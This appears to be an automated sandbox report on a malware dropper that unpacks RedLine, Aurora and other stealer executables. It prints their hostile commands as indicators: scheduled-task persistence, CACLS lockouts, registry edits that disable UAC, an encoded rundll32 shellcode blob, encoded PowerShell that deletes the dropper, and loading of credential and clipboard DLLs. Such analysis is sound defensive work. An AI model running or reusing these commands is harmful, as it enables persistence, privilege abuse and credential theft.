loda.exeredko.exenika.exeani.exerepa.exemeta3.exevbc.exevbc.exeredline3.exeAUDIODG.EXEpowershell.exepowershell.exepowershell.exeCBqrmoFax.exepowershell.exedescription pid process Token: SeDebugPrivilege 2236 loda.exe Token: SeDebugPrivilege 1916 redko.exe Token: SeDebugPrivilege 4992 nika.exe Token: SeDebugPrivilege 4164 ani.exe Token: SeDebugPrivilege 3264 repa.exe Token: SeDebugPrivilege 3448 meta3.exe Token: SeDebugPrivilege 3816 vbc.exe Token: SeDebugPrivilege 2308 vbc.exe Token: SeDebugPrivilege 1996 redline3.exe Token: 33 3076 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 3076 AUDIODG.EXE Token: SeDebugPrivilege 3432 powershell.exe Token: SeDebugPrivilege 4564 powershell.exe Token: SeDebugPrivilege 3008 powershell.exe Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeDebugPrivilege 3252 CBqrmoFax.exe Token: SeDebugPrivilege 2452 powershell.exe Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 Token: SeShutdownPrivilege 2756 Token: SeCreatePagefilePrivilege 2756 -
Suspicious use of FindShellTrayWindow 8 IoCs
Processes:
rundll32.exeRussian.exe.pifpid process 4164 rundll32.exe 1356 Russian.exe.pif 2756 2756 1356 Russian.exe.pif 1356 Russian.exe.pif 2756 2756 -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
Russian.exe.pifpid process 1356 Russian.exe.pif 1356 Russian.exe.pif 1356 Russian.exe.pif -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
OpenWith.exeiexplore.exepid process 1956 OpenWith.exe 3564 iexplore.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exehook.exeaniam.exemian.exemnolyk.execmd.exelebro.exenbveek.execmd.exedescription pid process target process PID 3036 wrote to memory of 4568 3036 9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exe hook.exe PID 3036 wrote to memory of 4568 3036 9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exe hook.exe PID 3036 wrote to memory of 4568 3036 9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exe hook.exe PID 4568 wrote to memory of 2236 4568 hook.exe loda.exe PID 4568 wrote to memory of 2236 4568 hook.exe loda.exe PID 4568 wrote to memory of 1916 4568 hook.exe redko.exe PID 4568 wrote to memory of 1916 4568 hook.exe redko.exe PID 4568 wrote to memory of 1916 4568 hook.exe redko.exe PID 3036 wrote to memory of 944 3036 9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exe aniam.exe PID 3036 wrote to memory of 944 3036 9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exe aniam.exe PID 3036 wrote to memory of 944 3036 9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exe aniam.exe PID 944 wrote to memory of 4476 944 aniam.exe mian.exe PID 944 wrote to memory of 4476 944 aniam.exe mian.exe PID 944 wrote to memory of 4476 944 aniam.exe mian.exe PID 4476 wrote to memory of 1384 4476 mian.exe mnolyk.exe PID 4476 wrote to memory of 1384 4476 mian.exe mnolyk.exe PID 4476 wrote to memory of 1384 4476 mian.exe mnolyk.exe PID 944 wrote to memory of 4164 944 aniam.exe ani.exe PID 944 wrote to memory of 4164 944 aniam.exe ani.exe PID 944 wrote to memory of 4164 944 aniam.exe ani.exe PID 1384 wrote to memory of 2000 1384 mnolyk.exe schtasks.exe PID 1384 wrote to memory of 2000 1384 mnolyk.exe schtasks.exe PID 1384 wrote to memory of 2000 1384 mnolyk.exe schtasks.exe PID 1384 wrote to memory of 1188 1384 mnolyk.exe cmd.exe PID 1384 wrote to memory of 1188 1384 mnolyk.exe cmd.exe PID 1384 wrote to memory of 1188 1384 mnolyk.exe cmd.exe PID 1188 wrote to memory of 1448 1188 cmd.exe cmd.exe PID 1188 wrote to memory of 1448 1188 cmd.exe cmd.exe PID 1188 wrote to memory of 1448 1188 cmd.exe cmd.exe PID 1188 wrote to memory of 3736 1188 cmd.exe cacls.exe PID 1188 wrote to memory of 3736 1188 cmd.exe cacls.exe PID 1188 wrote to memory of 3736 1188 cmd.exe cacls.exe PID 1188 wrote to memory of 4236 1188 cmd.exe cacls.exe PID 1188 wrote to memory of 4236 1188 cmd.exe cacls.exe PID 1188 wrote to memory of 4236 1188 cmd.exe cacls.exe PID 1188 wrote to memory of 1060 1188 cmd.exe cmd.exe PID 1188 wrote to memory of 1060 1188 cmd.exe cmd.exe PID 1188 wrote to memory of 1060 1188 cmd.exe cmd.exe PID 1188 wrote to memory of 2080 1188 cmd.exe cacls.exe PID 1188 wrote to memory of 2080 1188 cmd.exe cacls.exe PID 1188 wrote to memory of 2080 1188 cmd.exe cacls.exe PID 1188 wrote to memory of 5020 1188 cmd.exe cacls.exe PID 1188 wrote to memory of 5020 1188 cmd.exe cacls.exe PID 1188 wrote to memory of 5020 1188 cmd.exe cacls.exe PID 1384 wrote to memory of 4992 1384 mnolyk.exe nika.exe PID 1384 wrote to memory of 4992 1384 mnolyk.exe nika.exe PID 1384 wrote to memory of 3264 1384 mnolyk.exe repa.exe PID 1384 wrote to memory of 3264 1384 mnolyk.exe repa.exe PID 1384 wrote to memory of 3264 1384 mnolyk.exe repa.exe PID 1384 wrote to memory of 2224 1384 mnolyk.exe lebro.exe PID 1384 wrote to memory of 2224 1384 mnolyk.exe lebro.exe PID 1384 wrote to memory of 2224 1384 mnolyk.exe lebro.exe PID 2224 wrote to memory of 4896 2224 lebro.exe nbveek.exe PID 2224 wrote to memory of 4896 2224 lebro.exe nbveek.exe PID 2224 wrote to memory of 4896 2224 lebro.exe nbveek.exe PID 4896 wrote to memory of 5072 4896 nbveek.exe schtasks.exe PID 4896 wrote to memory of 5072 4896 nbveek.exe schtasks.exe PID 4896 wrote to memory of 5072 4896 nbveek.exe schtasks.exe PID 4896 wrote to memory of 5004 4896 nbveek.exe cmd.exe PID 4896 wrote to memory of 5004 4896 nbveek.exe cmd.exe PID 4896 wrote to memory of 5004 4896 nbveek.exe cmd.exe PID 5004 wrote to memory of 1268 5004 cmd.exe cmd.exe PID 5004 wrote to memory of 1268 5004 cmd.exe cmd.exe PID 5004 wrote to memory of 1268 5004 cmd.exe cmd.exe -
outlook_office_path 1 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
-
C:\Windows\SysWOW64\fontview.exe"C:\Windows\SYSWOW64\fontview.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exe"C:\Users\Admin\AppData\Local\Temp\9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hook.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hook.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\loda.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\loda.exe3⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\redko.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\redko.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\aniam.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\aniam.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mian.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mian.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe"C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe" /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "Admin:N"&&CACLS "mnolyk.exe" /P "Admin:R" /E&&echo Y|CACLS "..\5eb6b96734" /P "Admin:N"&&CACLS "..\5eb6b96734" /P "Admin:R" /E&&Exit5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "mnolyk.exe" /P "Admin:N"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "mnolyk.exe" /P "Admin:R" /E6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\5eb6b96734" /P "Admin:N"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\5eb6b96734" /P "Admin:R" /E6⤵
-
C:\Users\Admin\AppData\Local\Temp\1000014001\nika.exe"C:\Users\Admin\AppData\Local\Temp\1000014001\nika.exe"5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000015051\repa.exe"C:\Users\Admin\AppData\Local\Temp\1000015051\repa.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000018001\lebro.exe"C:\Users\Admin\AppData\Local\Temp\1000018001\lebro.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\9e0894bcc4" /P "Admin:N"&&CACLS "..\9e0894bcc4" /P "Admin:R" /E&&Exit7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"8⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E8⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\9e0894bcc4" /P "Admin:N"8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"8⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\9e0894bcc4" /P "Admin:R" /E8⤵
-
C:\Users\Admin\AppData\Local\Temp\1000003001\meta3.exe"C:\Users\Admin\AppData\Local\Temp\1000003001\meta3.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000023001\meta2.exe"C:\Users\Admin\AppData\Local\Temp\1000023001\meta2.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F9⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"10⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"10⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"10⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:N"10⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:R" /E10⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main9⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main10⤵
- Loads dropped DLL
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3368 -s 68011⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000043001\redline2.exe"C:\Users\Admin\AppData\Local\Temp\1000043001\redline2.exe"7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4528 -s 7208⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4528 -s 9488⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000063001\cc.exe"C:\Users\Admin\AppData\Local\Temp\1000063001\cc.exe"7⤵
- Executes dropped EXE
-
C:\Windows\system32\rundll32.exe"C:\Users\Admin\AppData\Roaming\nsis_unse57c043.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8E37AEwhAFUAaABCvhcASwBDAHhDADDvADkASi0CWUiD|+wo6AQCAABI|4PEKMPMzMxM|4lEJBhIiVQkvxBIiUwkCF0BSP+LRCQwSIkEJPaBAThIbwAISMdE2yQQLQHrDoEBEEjXg8ABjwEQgQFASO05lgBzJZ8Diwwk|0gDyEiLwUiL9UyrAVR7AAPRSIt|yooJiAjrwWYFv2VIiwQlYPPwM||JSItQGEg70f90NkiDwiBIi|8CSDvCdCpmg|94SBh1GkyLQP9QZkGDOGt0B+4REUt1CBEQeBAu|3QFSIsA69VI64tI|QDBagBAU1X|VldBVEFVQVb7QVddAWaBOU1a|02L+EyL8kiL79kPhfzz8ExjSf88QYE8CVBFAO8AD4Xq8|BBi4T7CYjz8IXASI087wEPhNZqEYO8Cd2MLQEPhMfz8ESL|2cgRItfHIt3|yREi08YTAPh|0wD2UgD8TPJv0WFyQ+EpDkBi||EQYsQRTPSSP8D04oChMB0HX9BwcoND77A+gDvAUQD0L8RdexB|4H6qvwNfHQO|4PBAUmDwARB|zvJc2nrxovB|w+3DE5FiyyLf0wD63RYM+2qEN90UUGLFMEA0zP|yYoCTIvC6w|bwcnIEQPI5RABQfuKANUQ7TPAM|bPQTsMtuAQpgCDxv8Bg|gIcu7rCv9Ii8tB|9VJie8E94PF5BDEBDvvbxhyr2YBQV9B|15BXUFcX15dfVszF0iB7GABZAD|i+noZv7||0jfhcAPhJh1IEyN+q8BiysQyDP|6Jv+fSCNXwRMjUVG|zPSi8v|VCRofoAgTIvgD4RrdSC9RagQM8CL05EgSK+JfCQgpiBwgCBIn4vwD4RLdSCmIFD|SI1WCESNR0DvSI2MJIURSIvYd+h8|X4gjVZI3iC1EOIhzPPw6GfvIESfiwaNVwhBIKYgWF7KIYmEJICHEt7z8HuLDtogWImMJHERbAcwkSDoMe8gi5wtMv9Mi106SIP7bP1IiiAwTIlkJDh3TIukGjJMiVyEAbeEJNyHEYaSjRGN3UdLMIwk8PPwSYtv1Ojp|AUwipx4MvdIjYR4MkGA8yG|jU9sRDAYpAKDv+kBdfOBvHgyIf9SZXh1TYuEJN30IjGUJPg1AcJI|zvYcjiD+mx23zNEjUlA+gCUQdO4AJgApiBAyiL4dPMZRLYwwDFJjVQk|WyRIEmD6Gzoa+6CMEiLzqYgeEiFf|90EotVQkyOMP4bMUiNTCRA|9cHSIHEdCFhJC0ILQE=8⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3852 -s 6489⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 7128⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000090001\redline1.exe"C:\Users\Admin\AppData\Local\Temp\1000090001\redline1.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\SETUP_22269\Engine.exeC:\Users\Admin\AppData\Local\Temp\SETUP_22269\Engine.exe /TH_ID=_3928 /OriginExe="C:\Users\Admin\AppData\Local\Temp\1000090001\redline1.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\CmD.exeC:\Windows\system32\CmD.exe /c cmd < 809⤵
-
C:\Windows\SysWOW64\cmd.execmd10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell get-process avastui11⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell get-process avgui11⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\certutil.execertutil -decode 5 5fbHlM11⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^BYLhzgJfvHMGFGbkIYAzlXUMcmgLOfzNNBjXWVOwahotMobsaoVUFcQEtYSUZYBuhYTtzmgNlmwWOQZjwXaFxnosKI$" 5fbHlM11⤵
-
C:\Users\Admin\AppData\Local\Temp\q25jy1i2.aam\15157\Russian.exe.pif15157\\Russian.exe.pif 15157\\N11⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 188412⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 186012⤵
- Program crash
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 1811⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\1000125001\video.exe"C:\Users\Admin\AppData\Local\Temp\1000125001\video.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exeC:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000126001\meta4.exe"C:\Users\Admin\AppData\Local\Temp\1000126001\meta4.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 396 -s 5568⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000129001\redline4.exe"C:\Users\Admin\AppData\Local\Temp\1000129001\redline4.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 5568⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000135001\redline3.exe"C:\Users\Admin\AppData\Local\Temp\1000135001\redline3.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1000135001\redline3.exeC:\Users\Admin\AppData\Local\Temp\1000135001\redline3.exe8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000136001\Aurora.exe"C:\Users\Admin\AppData\Local\Temp\1000136001\Aurora.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Checks processor information in registry
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#618⤵
- Blocklisted process makes network request
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\1000137001\NOTallowedtocrypt.exe"C:\Users\Admin\AppData\Local\Temp\1000137001\NOTallowedtocrypt.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f8⤵
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f9⤵
- UAC bypass
- Modifies registry key
-
C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"8⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f9⤵
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f10⤵
- UAC bypass
- Modifies registry key
-
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe"9⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f10⤵
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f11⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\SysWOW64\svchost.exesvchost.exe10⤵
-
C:\Users\Admin\AppData\Local\Temp\dwn.exe"C:\Users\Admin\AppData\Local\Temp\dwn.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
-
C:\Users\Admin\AppData\Roaming\CBqrmoFax.exe"C:\Users\Admin\AppData\Roaming\CBqrmoFax.exe"11⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAzAA==12⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQwBCAHEAcgBtAG8ARgBhAHgALgBlAHgAZQAiACAALQBGAG8AcgBjAGUA12⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000142001\meta5.exe"C:\Users\Admin\AppData\Local\Temp\1000142001\meta5.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1000142001\meta5.exe"C:\Users\Admin\AppData\Local\Temp\1000142001\meta5.exe"8⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main7⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main8⤵
- Loads dropped DLL
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3732 -s 6849⤵
- Program crash
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main7⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ani.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ani.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 4482⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3036 -ip 30361⤵
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exeC:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 396 -ip 3961⤵
-
